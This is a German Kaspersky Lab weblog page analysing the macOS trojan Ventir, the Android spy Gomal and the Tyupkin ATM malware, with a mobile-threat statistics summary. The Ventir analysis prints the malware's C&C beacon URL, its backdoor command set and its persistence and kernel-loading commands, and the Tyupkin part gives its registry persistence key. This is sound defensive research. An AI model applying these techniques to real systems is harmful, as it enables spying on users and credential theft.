Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2014  
Jan Feb Mär
Apr Mai Jun
Jul Aug Sep
Okt    
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Trojaner Ventir: Basteln Sie sich Ihren eigenen MacOS-Spion


  16 Oktober 2014 | 17:47  MSK

Ihr Kommentar  

Vor gar nicht langer Zeit erreichte uns bei Kaspersky Lab eine interessante Datei (MD5 9283c61f8cce4258c8111aaf098d21ee) zur Analyse, die sich als multimodularer Schädling für MacOS X erwies. Bereits nach einer ersten vorläufigen Untersuchung war klar, dass diese Datei nichts Gutes im Schilde führt: Die gewöhnliche ausführbare 64-Bit mach-o-Datei enthielt in einer Datensektion weitere mach-o-Dateien, von denen eine im Autostart platziert worden war, was typisch ist für ein trojanisches Dropper-Programm.

Weiterführende Untersuchungen brachten zutage, dass sich innerhalb des Schädlings eine Backdoor, ein Keylogger sowie ein trojanisches Spionage-Programm verbergen. Besonders bemerkenswert ist, dass der Keylogger eine Kernel-Erweiterung mit offenem Quellcode verwendet, die für jeden Interessierten verfügbar ist, beispielsweise auf GitHub!

Derzeit werden die entdeckten Dateien in Abhängigkeit von ihrer Bestimmung folgendermaßen von den Antiviren-Lösungen von Kaspersky Lab detektiert als: Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a und not-a-virus:Monitor.OSX.LogKext.c.

Quelldatei (Trojan-Dropper.OSX.Ventir.a)

Sofort nach dem Start überprüft der Dropper durch den Aufruf der Funktion geteuid(), ob er über die Rechte eines Superusers (oder auch Root-Rechte) verfügt. Vom Ergebnis dieser Überprüfung hängt es ab, wo die Dateien des Trojaners installiert werden:

  • Verfügt der Schädling über Superuser-Rechte, werden die Dateien in /Library/.local und /Library/LaunchDaemons installiert;
  • Verfügt der Schädling nicht über Root-Rechte, so werden die Dateien an den Orten ~/Library/.local und ~/Library/LaunchAgents installiert (die Tilde “~” kennzeichnet den Pfad zum Heimordner des aktuellen Anwenders).

Alle Dateien des Trojaners, die auf einen infizierten Computer geladen werden, nehmen von vornherein ihren Platz in der Sektion „__data“ der Dropper-Datei ein.

Anordnung der Trojaner-Dateien innerhalb des Droppers

Im Endeffekt werden in einem infizierten System die folgenden Dateien installiert:

  1. Library/.local/updated – startet die Dateien update und EventMonitor erneut, falls sie unerwartet beendet werden sollten.
  2. Library/.local/reweb – dient dem Neustart der Datei updated.
  3. Library/.local/update – Backdoor-Modul.
  4. Library/.local/libweb.db –Datenbankdatei des Schädlings. Enthält von vornherein die globale Konfiguration des Trojaners, beispielsweise die Adresse des C&C.
  5. Library/LaunchAgents (oder LaunchDaemons)/com.updated.launchagent.plist – Eigenschaftsdatei, die zur Installation der Datei Library/.local/updated im Autostart mit Hilfe von Daemon launchd ausgeführt wird.
  6. In Abhängigkeit davon, ob Superuser-Rechte vorhanden sind:

    А) wenn sie vorhanden sind – /Library/.local/kext.tar. Des Weiteren wird das Archiv entpackt:

    • updated.kext – Treiber, der die Tastatureingaben des Nutzers abfängt;
    • Keymap.plist – Karte der Übereinstimmungen der Codes der gedrückten Tasten mit deren Werten;
    • EventMonitor – Agent, der die Tastatureingaben sowie einige Systemereignisse in der Datei Library/.local/.logfile protokolliert.

    B) wenn sie nicht vorhanden sind - ~/Library/.local/EventMonitor. Ein Agent, der den Namen des aktuell aktiven Fensters und die Tastatureingaben in der Datei Library/.local/.logfile protokolliert

Nach Installation der aufgezählten Dateien legt der Trojaner mit Hilfe des Standard-Konsolentools launchctl die Datei updated in den Autostart (Befehl launchctl load %s/com.updated.launchagent.plist).

Für den Fall, dass Superuser-Rechte vorhanden sind, lädt der Dropper daraufhin mit Hilfe des Standardtools OSX kextload den protokollierenden Treiber in den Kernel (Befehl kextload /System/Library/Extensions/updated.kext)

Daraufhin lädt Trojan-Dropper.OSX.Ventir.a die Datei reweb und löscht sich selbst aus dem System.

Die Dateien updated und reweb

Die Datei updated beendet alle Prozess mit dem Namen reweb (Befehl killall -9 reweb). Dann überprüft er in Abständen, ob die Prozesse EventMonitor und update laufen und startet sie, wenn nötig, neu.

Die Datei reweb beendet alle Prozess mit den Namen updated und update, woraufhin sie die Datei Library/.local/updated startet.

Die Datei update (Backdoor.OSX.Ventir.a)

Zu Beginn ihrer Arbeit verteilt die Backdoor die Felderwerte aus der config-Tabelle der Datenbank libweb.db nach lokalen Variablen zur weiteren Verwendung.

Für den Befehlsempfang wird eine HTTP GET-Anfrage der folgenden Art verwendet: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0,

wobei key ein gewisser Schlüssel ist, der in libweb.db in der config-Tabelle gespeichert wird; udid eine МАС-Adresse ist, und 220.175.13.250:82 die IP-Adresse und den Port des C&C-Servers bezeichnen.

Diese Anfrage wird regelmäßig in kurzen Intervallen in einer Endlosschleife gesendet.

Die Backdoor kann die folgenden Befehle vom C&C ausführen:

  • reboot – Neustart des Computers;
  • restart – Neustart der Backdoor durch das Starten der Datei reweb;
  • uninstall – vollständiges Löschen der Backdoor aus dem System.
  • show config – Senden der Daten aus der config-Tabelle an den C&C-Server;
  • down exec – Aktualisierung der Datei update, Update-Download vom C&C-Server;
  • down config – Aktualisierung der Konfigurationsdatei libweb.db, Download des Updates vom C&C-Server;
  • upload config – Senden der Datei libweb.db an den C&C-Server;
  • update config:[Parameter] – Update der config-Datei in der Datenbankdatei libweb.db, in den Parametern werden die Felderwerte der Tabelle übermittelt;
  • executeCMD:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion popen(cmd, “r”) angegeben wird, Senden der Ausgabe des Befehls an den C&C-Server;
  • executeSYS:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion system(cmd) angegeben wird;
  • executePATH:[Parameter] – Start einer Datei aus dem Verzeichnis Library/.local/, der Dateiname wird im Parameter angegeben;
  • uploadfrompath:[Parameter] – Upload der Datei mit dem im Parameter vermerkten Namen aus dem Verzeichnis Library/.local/ auf den C&C-Server;
  • downfile:[Parameter] – Download der Datei mit dem im Parameter angegebene Namen vom C&C-Server und Speichern der Datei gemäß dem im Parameter angegebenen Pfad.

Teil des Befehls, der vom Backdoor-Modul verarbeitet wird

Datei EventMonitor (Trojan-Spy.OSX.Ventir.a)

Diese Datei wird ins System geladen, wenn es dem Dropper nicht gelingt, Superuser-Rechte zu erhalten. Nach dem Start installiert Trojan-Spy.OSX.Ventir.a mit Hilfe der API-Funktionen des Carbon Event Managers seine Systemereignis-Routine. In der neuen Routine erfolgt das Abfangen von Ereignissen, die mit dem Betätigen von Tasten zusammenhängen sowie deren Protokollierung in der Datei ~/Library/.local/.logfile. Hilfstasten (wie etwa shift) erscheinen im Protokoll in der folgenden Form: [command],  [option],  [ctrl], [fn], [ESC], [tab], [backspace] usw.

Verarbeitung von Tastatur-Ereignissen

Ebenfalls direkt vor der Verarbeitung der Tastenbetätigungen erfolgt die Bestimmung des Namens des Prozesses, dessen Fenster aktuell aktiv ist. Zu diesem Zweck werden die Funktionen GetFrontProcess und CopyProcessName aus der Carbon-API verwendet. Der Name des Prozesses wird ebenfalls ins Protokoll aufgenommen in Form von [Application {Name_Prozess} is the frontwindow]. Diesem Umstand ist es zu verdanken, dass der Trojaner bestimmen kann, in welche Anwendung die protokollierte Phrase eingebettet wurde.

Datei kext.tar (not-a-virus:Monitor.OSX.LogKext.c)

Wie bereits oben erwähnt, wird das Archiv kext.tar auf den infizierten Computer geladen, wenn es dem Trojaner Trojan-Dropper.OSX.Ventir gelungen ist, Root-Rechte zu erhalten. In dem Archiv befinden sich drei Dateien:

  • updated.kext
  • EventMonitor
  • Keymap.plist

Das Programmpaket updated.kext ist eine Kernel-Erweiterung (kext) mit offenem Quellcode, die für das Abfangen von Tastaturbetätigungen vorgesehen ist. Diese Erweiterung wird von uns schon seit Langem als not-a-virus:Monitor.OSX.LogKext.c detektiert, und ihr Quellcode (wie ebenfalls bereits erwähnt) ist zum gegenwärtigen Zeitpunkt für jeden Interessierten verfügbar.

Die Datei Keymap.plist ist eine Karte der Übereinstimmung des Codes gedrückter Tasten mit ihren Werten. Die Datei EventMonitor verwendet sie zur Bestimmung der Tastaturwerte nach den entsprechenden Codes, die ihr mit der Datei updated.kext übermittelt werden.

Die Datei EventMonitor ist ein Dateiagent, der Daten von der Kernel-Erweiterung updated.kext entgegennimmt, sie verarbeitet und in die Log-Datei /Library/.local/.logfile schreibt. Hier als Beispiel ein Teil eines solchen Protokolls, das die vom Trojaner abgefangenen Anmeldedaten inklusive Passwort enthält:

Wie man auf dem Screenshot sieht, landen Benutzername und Kennwort des E-Mail-Accounts umgehend im Log, sobald das Opfer die Seite yandex.ru im Browser aufgerufen und die entsprechenden Daten dort eingegeben hat – und von dort wandern sie direkt in die Hände der Cyberkriminellen.

Diese Bedrohung ist gerade vor dem Hintergrund des noch nicht lange zurückliegenden Vorfalls besonders aktuell, bei dem es zum Verlust von Anmeldeinformationen und Passwörtern für Accounts bei Yandex.ru, Mail.ru und Gmail kam. Es ist nicht ausgeschlossen, dass am Auffüllen dieser Datenbanken auch Schädlinge der Familie Ventir beteiligt waren.

Zum Abschluss sei erwähnt, dass der Trojaner Trojan-Dropper.OSX.Ventir.a mit seiner multimodularen Struktur an den berüchtigten Trojan.OSX.Morcut (alias OSX/Crisis) erinnert, der in etwa dieselbe Anzahl an Modulen mit ähnlicher Bestimmung enthielt. Die Verwendung von Software mit offenem Quellcode erleichtert Cyberkriminellen die Konstruktion neuer Schädlinge erheblich. Daher ist davon auszugehen, dass die Zahl trojanischer Spionage-Programme künftig weiter steigen wird.

„Tic Tac Toe“ mit Überraschung


  10 Oktober 2014 | 13:00  MSK

Ihr Kommentar  

Die Versuche Cyberkrimineller, Schadprogramme als nützliche Anwendungen zu tarnen, sind so häufig geworden, dass sie schon zum Alltag gehören. Doch die Entwickler des neuen mobilen Trojaners Gomal zeigten sich nicht nur bei der Tarnung kreativ, indem sie ihrem Machwerk das Spiel „Tic Tac Toe“ hinzufügten, sondern sie statteten den Schädling auch mit interessanten und für diese Art von Software neuen Techniken aus.

Alles begann damit, dass uns das Spiel Tic Tac Toe zur Analyse überlassen wurde. Auf den ersten Blick machte die Anwendung einen völlig ungefährlichen Eindruck:

Tic Tac Toe mit Überraschung

Die Liste der von dem Spiel angefragten Ermächtigungen ließ uns allerdings stutzig werden. Wozu braucht die Anwendung Zugriff auf das Internet, auf die Kontakte des Anwenders und das SMS-Archiv, wozu die Möglichkeit, Anrufe und Audioaufzeichnungen zu verarbeiten? Wir haben Untersuchungen angestellt und herausgefunden, dass es sich bei diesem „Spiel“ in Wahrheit um eine multifunktionale Spionage-Software handelt. Zum gegenwärtigen Zeitpunkt wird diese Malware von den Kaspersky Lab-Produkten als Trojan-Spy.AndroidOS.Gomal.a detektiert.

Eine sorgfältige Untersuchung des Schädlings hat gezeigt, dass der Code des Spiels selbst weniger als 30% der hauptsächlichen ausführbaren Datei ausmacht. Der Rest ist der Funktionalität zur Bespitzelung des Anwenders und zum Diebstahl persönlicher Informationen vorbehalten.

Tic Tac Toe mit Überraschung

Grün eingefasst der Code des Spiels, mit roter Umrandung – der schädliche Teil des Programms

Was genau zählt nun zu dieser Funktionalität? In erster Linie enthält der Schädling die für mobile Schädlinge schon zum Standardprogramm gehörenden Funktionen ‚Audioaufzeichnung‘

Tic Tac Toe mit Überraschung

und SMS-Diebstahl.

Tic Tac Toe mit Überraschung

Zudem sammelt der Trojaner Informationen über das Gerät und sendet alle ergatterten Daten an den Server seiner Betreiber. Allerdings hat Trojan-Spy.AndroidOS.Gomal.a auch etwas Außergewöhnliches an sich – zusammen mit dem Trojaner wird auch ein ganzes Paket von interessanten Bibliotheken mitgeliefert.

Tic Tac Toe mit Überraschung

Bei einem Teil dieses Paketes handelt es sich um ein Exploit, das unerlässlich zum Erhalt von Root-Rechten auf einem Android-Gerät ist. Mit den erweiterten Privilegien hat die Anwendung Zugriff auf verschiedene Dienste des Betriebssystems Linux (auf dem Android basiert), insbesondere auf das Lesen des Speichers eines Prozesses und /maps.

Nach Erhalt der Root-Rechte macht sich der Trojaner an die Arbeit. So stiehlt er beispielsweise die Mail-Korrespondenz der Anwendung Good for Enterprise, wenn diese auf dem Smartphone installiert ist. Diese App wird als sicherer E-Mail-Client für Unternehmen positioniert, daher könnte der Datendiebstahl aus diesem Programm ernsthafte Probleme für das Unternehmen nach sich ziehen, in dem der angegriffene Mitarbeiter tätig ist. Für die Attacken auf Good for Enterprise empfängt der Trojaner mit Hilfe der Konsole (Befehl ps) die ID des interessierenden Prozesses und liest die virtuelle Datei /proc/<pid>/maps. Diese Datei enthält Informationen über die der Anwendung bereitgestellten Speicherblöcke.

Tic Tac Toe mit Überraschung

Nach Erhalt der Liste von Blöcken findet der Schädling den Block [heap], der die Zeilendaten der Anwendung enthält und erstellt eine Kopie des Speicherinhalts mit Hilfe einer weiteren Bibliothek aus seinem Paket. Daraufhin wird in dem nun erhaltenen Speicherauszug eine Suche nach für E-Mails typischen Signaturen durchgeführt, und die auf diese Weise gefundenen Mails werden an den Server der Cyberkriminellen weitergeleitet.

Darüber hinaus stiehlt Gomal Informationen aus Logcat – einem in Android integrierten Protokollierungsdienst, der für das Debugging von Anwendungen verwendet wird. Sehr häufig hinterlassen Entwickler auch nach der Veröffentlichung ihrer App kritisch wichtige Informationen in Logcat. Dank dieser Tatsache sind Cyberkriminelle in der Lage, noch mehr vertrauliche Informationen aus anderen Programmen zu stehlen.

Unter dem Strich eröffnet das auf den ersten Blick harmlose „Tic Tac Toe“ Verbrechern den Zugriff auf eine enorme Menge persönlicher Daten des Anwenders, sowie auf die Daten des Unternehmens, in dem er arbeitet. Die von Gomal angewandte Technik trat erstmals in Windows-Trojanern in Erscheinung, doch wie wir sehen, wird sie nun auch in Android-Schädlingen eingesetzt. Das Gefährlichste dabei ist jedoch, dass unter Anwendung derselben Prinzipien nicht nur Informationen aus Good for Enterprise gestohlen werden können: Es ist nicht ausgeschlossen, dass schon bald eine ganze Reihe von mobilen Schädlingen auf den Plan tritt, die weit verbreitete E-Mail-Clients, Messenger und andere Programme angreifen.

Ergänzung:

Trojan-Spy.AndroidOS.Gomal.a verwendet eine alte Version des Exploits, die auf Samsung-Geräten mit Betriebssystemen der Versionen 4.0.4 und niedriger funktioniert. Daher ist auf Geräten mit neuer Firmware eine Attacke eben dieser Version des Schädlings auf den E-Mail-Client des Unternehmens nicht erfolgreich.

Wir haben bisher noch keine Versuche registriert, unsere Anwender mit dem Trojaner Gomal zu infizieren. Doch obgleich dieses Sample bisher nicht in freier Wildbahn verbreitet ist, detektieren wir es, um künftig effektiv Angriffe mobiler Schädlinge abwehren zu können, die unter Umständen auf der Grundlage dieses Konzepts entwickelt wurden.

Tyupkin: Manipulation von Geldautomaten durch Malware


  Global Research and Analysis Team of Kaspersky Lab        7 Oktober 2014 | 10:48  MSK

Ihr Kommentar  

Früher in diesem Jahr führte Kasperskys Global Research and Analysis Team, GReAT, auf Anfrage einer Finanzinstitution, forensische Ermittlungen einer cyberkriminellen Attacke auf zahlreiche Geldautomaten in Osteuropa durch.

Im Zuge dieser Ermittlungen entdeckten wir ein Schadprogramm, dass es Angreifern ermöglicht, die Geldkassetten von Bankomaten durch direkte Manipulation zu leeren.

Zum Zeitpunkt der Ermittlungen war die Malware auf mehr als 50 Geldautomaten in osteuropäischen Banken aktiv. Ausgehend von von VirusTotal vorgelegten Daten glauben wir, dass das Schadprogramm sich in einige andere Länder ausgebreitet hat, die USA, Indien und China eingeschlossen.

Aufgrund der Natur der Geräte, auf denen die Malware läuft, verfügen wir nicht über KSN-Daten, um das Ausmaß der Infektion zu bestimmen. Doch auf der Grundlage einer von VirusTotal erstellten Statistik, erkennen wir ein Vorkommen dieses Schadprogramms in den folgenden Ländern:

Tyupkin: Manipulation von Geldautomaten durch Malware

Tyupkin: Manipulation von Geldautomaten durch Malware

Diese neue Malware, die von Kaspersky Lab als Backdoor.MSIL.Tyupkin detektiert wird, betrifft Geldautomaten von einem großen Bankomaten-Hersteller, auf denen Microsoft Windows 32 läuft.

Die Malware setzt verschiedene raffinierte Techniken ein, um eine Detektion zu vermeiden. Erstens ist sie nur in bestimmten Nachtstunden aktiv. Sie verwendet dabei einen zufällig generierten Schlüssel für jede Sitzung. Ohne diesen Schlüssel kann niemand mit dem infizierten Geldautomaten interagieren.

Wird der Schlüssel korrekt eingegeben, zeigt das Schadprogramm Informationen über den in jeder Kassette verfügbaren Geldbetrag an und ermöglicht einem Angreifer, ohne physischen Zugriff auf den Geldautomaten 40 Banknoten aus der ausgewählten Kassette zu entnehmen.

Die meisten der analysierten Samples wurden um den März 2014 herum kompiliert. Doch mit der Zeit hat sich diese Malware weiterentwickelt. In ihrer letzten Variante (Version .d) verfügt die Schadsoftware über Anti-Debug- und Anti-Emulationstechniken und deaktiviert zudem McAfee Solidcore auf einem infizierten System.

Analyse

Dem Bildmaterial der Überwachungskameras an den Standorten der infizierten Geldautomaten zufolge können die Angreifer das Gerät über eine bootbare CD manipulieren und die Malware installieren.

Die Angreifer kopieren die folgenden Dateien in den Geldautomaten:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

Nach mehreren Umgebungs-Checks entfernt das Schadprogramm die .lnk-Datei und erstellt einen Schlüssel in der Registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
“AptraDebug” = “C:\Windows\system32\ulssm.exe”

Die Malware ist dann in der Lage, mit Geldautomaten über die Standardbibliothek MSXFS.dll zu interagieren – Erweiterung für Finanzdienste (XFS).

Die Schadsoftware läuft in einer Endlosschleife und wartet auf Input des Nutzers. Um die Erkennung zu erschweren, nimmt Tyupkin (in der Standardeinstellung) nur sonntags und montags in der Nacht Befehle entgegen.

Die Malware akzeptiert die folgenden Befehle:

  • XXXXXX – Zeigt das Hauptfenster.
  • XXXXXX – Löscht sich selbst mit einer Batch-Datei.
  • XXXXXX – Verlängert die Zeitspanne der Malware-Aktivität.
  • XXXXXX – Verbirgt das Hauptfenster.

Nach jedem Befehl muss der Betreiber “Enter” auf dem Eingabefeld des Geldautomaten drücken.

Tyupkin verwendet Sitzungsschlüssel auch, um Interaktion mit zufälligen Nutzern zu verhindern. Nach Eingabe des Befehls zur Anzeige des Hauptfensters zeigt die Schadsoftware die Aufforderung “ENTER SESSION KEY TO PROCEED!”- „Geben Sie den Session-Schlüssel ein, um fortzufahren!“- an, wobei für jede Sitzung ein Seed Key verwendet wird.

Der Angreifer muss den Algorithmus kennen, um einen auf dem gezeigten Seed Key basierenden Sitzungsschlüssel generieren zu können. Nur wenn dieser Schlüssel korrekt eingegeben wird, ist es möglich, mit einem infizierten Geldautomaten zu interagieren.

Daraufhin zeigt die Malware die folgende Mitteilung an:

CASH OPERATION PERMITTED.
TO START DISPENSE OPERATION -
ENTER CASSETTE NUMBER AND PRESS ENTER.
(BAR-VORGANG ERLAUBT. UM DEN AUSGABEVORGANG ZU STARTEN, GEBEN SIE DIE KASSETTENNUMMER EIN UND DRÜCKEN SIE ENTER).

Wird nun eine Kassettennummer eingegeben, gibt der Geldautomat 40 Banknoten aus dieser Kassette aus.

Tyupkin: Manipulation von Geldautomaten durch Malware

Wird der Sitzungsschlüssel falsch eingegeben, deaktiviert das Schadprogramm das lokale Netzwerk und zeigt die folgende Nachricht an:

DISABLING LOCAL AREA NETWORK...
PLEASE WAIT...
(LOKALES NETZWERK WIRD DEAKTIVIERT…
BITTE WARTEN…)

Es ist nicht klar, warum die Malware das LAN deaktiviert. Vermutlich geschieht das, um entfernte Untersuchungen zu verhindern oder zu unterbrechen.

Ein Video mit einer Demonstration an einem echten Geldautomaten ist unter dem folgenden Link verfügbar: http://youtu.be/QZvdPM_h2o8

Fazit

In den letzten Jahren beobachten wir eine deutliche Zunahme von Angriffen auf Geldautomaten unter Verwendung von Skimming-Geräten und Schadsoftware. Nach umfassenden Berichten über Fälle, bei denen Finanzdaten von Banken auf der ganzen Welt abgegriffen wurden, kam es zu einem energischen Durchgreifen der Strafverfolgungsbehörden rund um den Globus, das zu Verhaftungen und Verurteilungen von Cyberkriminellen führte.

Die erfolgreiche Verwendung von Skimming-Geräten zum heimlichen Auslesen und Kopieren von Kredit- und Bankkarten, wenn die Kunden ihre Karten in Geldautomaten bei Banken oder Tankstellen stecken, ist hinreichend bekannt. Dieses Problem ist mittlerweile stärker in das öffentliche Bewusstsein gerückt, so dass die Bankkunden nun auf der Hut sind und Vorsichtsmaßnahmen ergreifen, wenn sie öffentliche Bankomaten benutzen.

Nun werden wir Zeuge der natürlichen Evolution dieser Bedrohung, wobei die Cyberkriminellen in der Nahrungskette aufsteigen und nun die Finanzinstitutionen direkt angreifen. Das geschieht über die unmittelbare Infektion der Geldautomaten selbst oder durch direkte APT-artige Angriffe auf die Bank. Die Tyupkin-Malware ist ein Beispiel dafür, dass die Angreifer eine Stufe aufgestiegen sind und Schwachstellen in der Infrastruktur von Geldautomaten finden.

Die Tatsache, dass auf vielen Bankomaten Betriebssysteme mit bekannten Sicherheitslücken laufen, sowie fehlende Schutzlösungen sind weitere Probleme, die dringend behandelt werden müssen.

Wir empfehlen den Banken, die physische Sicherheit ihrer Geldautomaten zu überprüfen und über eine Investition in hochwertige Sicherheitslösungen nachzudenken.

Empfehlungen

Wir empfehlen Finanzinstitutionen und Organisationen, die Geldautomaten vor Ort betreiben, die folgenden Richtlinien zu beachten:

  • Überprüfen Sie die physische Sicherheit Ihrer Geldautomaten und denken Sie über eine Investition in hochwertige Sicherheitslösungen nach.
  • Ändern Sie die Standard Upper Pool Lock und die Standard-Schlüssel in allen Geldautomaten. Vermeiden Sie die Verwendung von Master-Keys vom Hersteller.
  • Installieren Sie Alarmanlagen an den Geldautomaten und stellen Sie sicher, dass sie auch funktionieren. Beobachtungen zufolge infizierten die Cyberkriminellen hinter Tyupkin nur Geldautomaten ohne Alarmanlagen.
  • Um zu erfahren, wie Sie in einem Schritt herausfinden können, ob Ihre Automaten infiziert sind, nehmen Sie über die folgende Adresse Kontakt mit uns auf: intelreports@kaspersky.com. Um die Geldautomaten-Systeme komplett zu scannen und die Backdoor zu löschen, verwenden Sie bitte das kostenlose Virus Removal Tool von Kaspersky Lab (zum Download geht es hier).

Allgemeine Ratschläge für Betreiber von Geldautomaten außer Haus

  • Stellen Sie sicher, dass der Geldautomat in einer offenen, gut beleuchteten Umgebung steht, die von sichtbaren Überwachungskameras beobachtet wird. Der Bankomat sollte sicher auf dem Boden mit einem Anti-Lasso-Gerät befestigt sein, das Verbrecher abschreckt.
  • Überprüfen Sie die die Bankomaten regelmäßig auf Anzeichen, die auf das Anbringen von Dritt-Geräten (Skimmer) hinweisen.
  • SeienSie auf der Hut vor Social Engineering-Attacken von Kriminellen, die sich als Sicherheitsinspektoren für die Alarmanlagen, Überwachungsanlagen oder andere Geräte vor Ort ausgeben.
  • Nehmen Sie Eindringungsalarme ernst und verhalten Sie sich dementsprechend, indem Sie die zuständigen Strafverfolgungsbehörden über jedes potentielle Leck informieren.
  • Ziehen Sie in Betracht, den Geldautomaten mit gerade ausreichend Geld für den Betrieb für einen Tag auszustatten.
  • Mehr Empfehlungen - sowohl für Händler als auch für Nutzer - finden Sie unter  http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx

KSN-Report zu mobilen Cyberbedrohungen: Android-paranoid


   6 Oktober 2014 | 15:00  MSK

Ihr Kommentar  

Smartphones und Tablets haben sich schon lange als beliebte persönliche Geräte etabliert. Eine im Frühjahr 2014 durchgeführte gemeinsame Studie von Kaspersky Lab und B2B International hat gezeigt, dass 77% der befragten Internetnutzer mehrere Geräte zum Surfen im World Wide Web benutzen – neben den traditionellen Computern sind das insbesondere Smartphones und Tablets. Laut IDC wurden im zweiten Quartal 2014 insgesamt 85% des Marktes für mobile Geräte von Android eingenommen. Diese Zahlen sind eine Bestätigung der unangefochtenen Führungsrolle Androids unter den mobilen Umgebungen.

Das bedeutet auch, dass Geräte unter Android unweigerlich die Aufmerksamkeit von Cyberkriminellen auf sich ziehen, die Malware entwickeln und in Umlauf bringen. Wir schätzen, dass 98,05% aller existierenden mobilen Schadprogramme die Nutzer von Android-Geräten angreift. Aber wie viel genau sind “alle existierenden Schadprogramme“? Unsere Daten zeigen, dass allein in der ersten Hälfte des laufenden Jahres 175.442 neue individuelle Schadprogramme für Android detektiert wurden. Das sind 18,3% (oder 32.231 Schadprogramme) mehr als in dem gesamten Jahr 2013. Aus diesem und anderen Gründen kann man mit Fug und Recht behaupten, dass die erdrückende Mehrheit mobiler Cyberbedrohungen sich gegen Android richtet.

Um einschätzen zu können, wie groß diese Bedrohung ist, haben wir unseren Kaspersky Security Network Report zu mobilen Cyberbedrohungen erstellt. Erstmals arbeiteten wir dabei mit einem externen Partner zusammen, um unsere Studie zu vervollständigen. Unsere Kollegen von INTERPOL teilten dabei ihre Fachmeinung darüber mit uns, wie sich die Cyberkriminalität entwickelt hat, sowie einige Informationen darüber, welche Art mobiler Bedrohungen sie in letzter Zeit ermittelt haben.

Diese Studie bezieht sich auf den 12monatigen Zeitraum vom 1. August 2013 bis zum 31 Juli 2014. Der Untersuchungszeitraum wurde auf der Grundlage von Kaspersky Lab-Daten ausgewählt. Kaspersky Lab begann im Mai 2012 statistische Daten über Angriffe gegen Android-User zusammenzutragen. Im Laufe der folgenden zwei Jahre wurde beobachtet, dass die Zahl der Android-Bedrohungen, die Zahl der Angriffe und die Zahl der angegriffenen User gerade innerhalb des oben erwähnten Zeitraums besonders stark gestiegen sind.

Detektionen der Kaspersky Lab-Sicherheitsprodukte von  Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte


Detektionen der Kaspersky Lab-Sicherheitsprodukte von Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte.

Die Quelle der in der vorliegenden Studie verwendeten Daten ist der Cloud-Service Kaspersky Security Network (KSN), an dem mehr als 5.000.000 Nutzer von Android-basierten Smartphones und Tablets teilnehmen, die von Kaspersky Lab-Produkten geschützt werden. Im Rahmen dieser Studie wurden die von diesen Geräten gesammelten Daten analysiert.

Die wichtigsten Studienergebnisse in der Zusammenfassung:


  • Innerhalb von 12 Monaten meldeten die Sicherheitsprodukte von Kaspersky Lab 3.408.112 Malware-Detektionen auf den Geräten von 1.023.202 Nutzern.

  • Innerhalb von 10 Monaten, von August 2013 bis März 2014, hat sich die Zahl der Attacken pro Monat fast verzehnfacht, von 6.000 im August 2013 auf 644.000 im März 2014.

  • Die Zahl der angegriffenen Nutzer ist ebenfalls drastisch gestiegen, von 35.000 im August 2013 auf 242.000 im März 2014.

  • 59.06% der Malware-Detektionen sind Programmen zuzuordnen, die in der Lage sind, den Anwendern Geld zu stehlen

  • Ungefähr 500.000 Nutzer waren mit mobiler Malware konfrontiert, die mindestens auf den Diebstahl von Geld spezialisiert ist.

  • In Russland, Indien, Kasachstan, Vietnam, der Ukraine und Deutschland wurden die meisten Angriffe registriert.

  • Die auf den Versand von SMS spezialisierten Trojaner waren die am weitesten verbreiteten Schadprogramme im Untersuchungszeitraum. Auf sie entfielen 57,08% aller Detektionen.

  • Die Zahl der Modifikationen mobiler Bank-Trojaner ist innerhalb von 12 Monaten um mehr als das 14-Fache gestiegen – von einigen hundert auf mehr als 5000.

In der Studie wurde zudem das Benehmen einiger weit verbreiteten Typen von Android-Schädlingen genauer unter die Lupe genommen. Insbesondere haben wir die Entwicklung von Attacken unter Verwendung von SMS und Bank-Trojanern sowie Spyware näher verfolgt. Ein weiteres Thema der Untersuchung sind die so genannten Affiliate Programme, oder auch Partner-Programme. Dabei handelt es sich um spezielle webbasierte Geschäftsmodelle, die vielfältige Betrugsarten ermöglichen, mittels derer Geld durch die Verbreitung von Schadprogrammen und die Infektion von Anwendergeräten verdient werden kann. Diese Programme senden SMS an Premium-Kurznummern, die das mobile Prepaid-Konto des Opfers leeren.

Während des Untersuchungszeitraums beobachteten wir mindestens vier große aktive Affiliate Programme, die für etwa ein Viertel aller Angriffe in dem entsprechenden Zeitraum verantwortlich waren. Alle diese Affiliate Programme waren vornehmlich in Russland und Ländern der ehemaligen Sowjetunion aktiv, aber jedes von ihnen verwendete eine andere Familie von SMS-Trojanern. Weitere vier Programme, die wir beobachteten, richteten sich in erster Linie gegen Nutzer aus Europa und Asien.

Wir haben mit Erstaunen festgestellt, dass die Aktivität fast aller Affiliate Programme, die wir verfolgten, im letzten Frühjahr deutlich zurückgegangen ist. Unserer Meinung nach liegt ein Grund für diesen Rückgang in einer Antibetrugsinitiative, die die russische Regierung im Mai dieses Jahres gestartet hat.

Wenn Sie mehr über die Android-Bedrohungslandschaft aus der Sicht von Kaspersky Lab und INTERPOL erfahren möchten, finden Sie hier hier den vollständigen Text der Studie.

Löcher im Schutz von Unternehmensnetzwerken: Zugriffskontrolle


  Kirill Kruglov        30 September 2014 | 18:49  MSK

Ihr Kommentar  

